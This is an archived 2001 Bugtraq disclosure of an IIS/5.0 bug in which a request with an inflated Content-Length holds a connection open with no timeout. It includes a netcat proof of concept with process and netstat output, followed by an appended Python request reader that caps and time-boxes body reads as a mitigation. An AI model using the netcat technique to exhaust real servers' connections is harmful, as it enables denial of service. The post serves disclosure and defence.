[23456] in bugtraq


Microsoft IIS/5 bogus Content-length bug.

daemon@ATHENA.MIT.EDU (Ivan Hernandez Puga)
Tue Dec 11 14:25:12 2001

Date: Tue, 11 Dec 2001 12:31:43 -0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Message-ID: <243C47087E9A9E4A86A2650B4E454EC19898@globalsis1.globalsis.com.ar>
content-class: urn:content-classes:message
From: "Ivan Hernandez Puga" <ivan.hernandez@globalsis.com.ar>
To: <focus-ms@securityfocus.com>
Cc: <bugtraq@securityfocus.com>
Content-Transfer-Encoding: 8bit

Let's say that it's a bug, not a security flaw, but it probably can lead
to a denial of service with some tweaking.
When you send a bad request to a Microsoft IIS/5.0 server it gives you the
error and closes the connection, like when you fail to authenticate.
Well... let's take a look at a normal request:
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic

And then let's add a "Content-Length: 5300643" field.

When you send the new request to the server it hangs there waiting for
something to happen and never closes the connection.

Let's try this:
$ cat >bogus.txt <<'EOF'
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic
EOF

$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
      PID    PPID    PGID     WINPID  TTY  UID    STIME COMMAND
      696       1     696        696  con  500 12:22:37 /usr/bin/bash
     2464     696    2464       2464  con  500 12:23:56 /usr/bin/nc
     2532     696    2532       1552  con  500 12:29:16 /usr/bin/ps

$ netstat -an |grep 192.168.0.10
  TCP    192.168.0.4:2479       192.168.0.10:80        ESTABLISHED

Now you have a waiting open connection. You can open as many as you
want. The server never stops the connections and I have seen no timeout.

Well, I left this here.

Thanks for taking the time to read this.

Ivan Hernandez
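A defender-side illustration, added here and not part of the original post or of IIS: a minimal request reader that refuses an oversized declared Content-Length up front and time-boxes the wait for the body, so a header block like the one above is answered with 408 instead of holding the connection open indefinitely. The limits, function names and the socketpair harness are assumptions.

```python
import socket

MAX_BODY = 16 * 1024 * 1024   # assumed policy: largest Content-Length accepted
BODY_TIMEOUT = 2.0            # assumed policy: seconds to wait for the body after headers

def parse_request(raw):
    """Split raw bytes into (request line, lowercase header dict, leftover body)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest

def read_request(conn, max_body=MAX_BODY, body_timeout=BODY_TIMEOUT):
    """Read one HTTP request with bounded waiting; returns (status, body)."""
    # 200 complete, 413 Content-Length over max_body, 408 body timed out, 400 malformed.
    conn.settimeout(body_timeout)
    buf = b""
    try:
        while b"\r\n\r\n" not in buf:               # collect the header block
            chunk = conn.recv(4096)
            if not chunk:
                return 400, b""
            buf += chunk
        _, headers, body = parse_request(buf)
        try:
            length = int(headers.get(b"content-length", b"0"))
        except ValueError:
            return 400, b""
        if length < 0 or length > max_body:         # refuse before waiting at all
            return 413, b""
        while len(body) < length:                   # body read is time-boxed
            chunk = conn.recv(min(4096, length - len(body)))
            if not chunk:
                return 400, b""
            body += chunk
    except socket.timeout:                          # the failure mode above: no body ever comes
        return 408, b""
    return 200, body[:length]

def simulate(request_bytes, body_timeout=0.2):
    # Constructed harness: push request_bytes through a socketpair and read it back.
    client, server = socket.socketpair()
    client.sendall(request_bytes)
    try:
        return read_request(server, body_timeout=body_timeout)
    finally:
        client.close(); server.close()
```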

